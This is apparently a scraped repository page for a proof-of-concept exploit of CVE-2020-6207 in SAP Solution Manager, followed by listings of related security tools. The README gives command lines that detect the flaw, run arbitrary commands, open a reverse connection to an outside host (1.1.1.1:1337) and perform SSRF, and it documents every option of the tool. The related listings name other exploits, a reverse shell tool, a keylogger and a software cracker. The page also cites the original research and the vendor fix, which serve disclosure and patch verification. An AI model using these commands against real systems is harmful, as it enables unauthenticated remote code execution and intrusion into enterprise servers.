PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)

Related tags

Security related resourcesSAP_EEM_CVE-2020-6207
Overview

PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:

Paper: An Unauthenticated Journey to Root :Pwning Your Company's Enterprise Software Servers
Solution: sap note 2890213

Follow me in Twitter: @chipik

This project is created only for educational purposes and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project

Details

You will find vulnerabilities details in process article

How to use

Just point SAP Solution Manager hostnmae/ip.

Check

➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

Trigger RCE

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

gif

Get BackConnect

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

Other

There is additional options:

➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
Owner
chipik
https://twitter.com/_chipik
chipik
GitHub Repository
Using python 3 and Flask an MVC system where the AES 128 CBC and Trivium algorithms

This project was developed using python 3 and Flask, it is an MVC system where the AES 128 CBC and Trivium algorithms can be tested through a communication between the computer and a device such as a

Brandon Israel Camacho Reyes 1 Dec 26, 2021
CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

antx 365 Nov 30, 2022
Scans all drives for log4j jar files and gets their version from the manifest

log4shell_scanner Scans all drives for log4j jar files and gets their version from the manifest. Windows and Windows Server only.

Zdeněk Loučka 1 Dec 29, 2021
DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

vijay sahu 12 Dec 17, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 03, 2023
Uma ferramenta de segurança da informação escrita em python3,capaz de dar acesso total ao computador de alguém!

shell-reverse Uma ferramenta de segurança da informação escrita em python3, capaz de dar acesso total ao computador de alguém! A cybersecurity tool wr

Marcus Vinícius Ribeiro Andrade 1 Nov 03, 2021
😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.

😭 WSOB (CVE-2022-29464) 😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:

0p 25 Oct 14, 2022
Repository for a project of the course EP2520 Building Networked Systems Security

EP2520_ACME_Project Repository for a project of the course EP2520 Building Networked Systems Security in Royal Institute of Technology (KTH), Stockhol

1 Dec 11, 2021
labsecurity is a framework and its use is for ethical hacking and computer security

labsecurity labsecurity is a framework and its use is for ethical hacking and computer security. Warning This tool is only for educational purpose. If

Dylan Meca 16 Dec 08, 2022
解密哥斯拉webshell管理工具流量

kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.

h4ck for fun 46 Dec 21, 2022
Python low-interaction honeyclient

Thug The number of client-side attacks has grown significantly in the past few years shifting focus on poorly protected vulnerable clients. Just as th

Angelo Dell'Aera 896 Dec 19, 2022
StarUML cracker - StarUML cracker With Python

StarUML_cracker Usage On Linux Clone the repo. git clone https://github.com/mana

Bibek Manandhar 9 Jun 20, 2022
A simple way to store your passwords without requiring third party applications

SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

Leone Odinga 1 Dec 23, 2021
a cool, easily usable and customisable subdomains scanner

Subdah 🔎 another subdomains scanner. Installation ⚠️ Python 3.10 required ⚠️ $ git clone https://github.com/traumatism/subdah $ cd subdah $ pip3 inst

toast 14 Oct 18, 2022
CVE-2021-21972

CVE-2021-21972 % python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e [*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authoriz

Keith Lee 30 Nov 19, 2022
This is a keylogger in python for Windows, Mac and Linux!

Python-Keylogger This is a keylogger in python for Windows, Mac and Linux! #How to use it by downloading the zip file? Download the zip file first The

Zeus_Dxvxm 2 Nov 12, 2021
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Auto Tor Ip Changer

AutoTor Auto Tor Ip Changer for Linux! git clone https://github.com/Arest7/AutoTor cd AutoTor pip install -r requirements.txt python3 AutoTor.py follo

Ken Ryuguji 3 Jan 23, 2022
INFO 3350/6350, Spring 2022, Cornell

Information Science 3350/6350 Text mining for history and literature Staff and sections Instructor: Matthew Wilkens Graduate TAs: Federica Bologna, Ro

Wilkens Teaching 6 Feb 21, 2022
M.E.A.T. - Mobile Evidence Acquisition Toolkit

M.E.A.T. - Mobile Evidence Acquisition Toolkit Meet M.E.A.T! From Jack Farley - BlackStone Discovery This toolkit aims to help forensicators perform d

1 Nov 11, 2021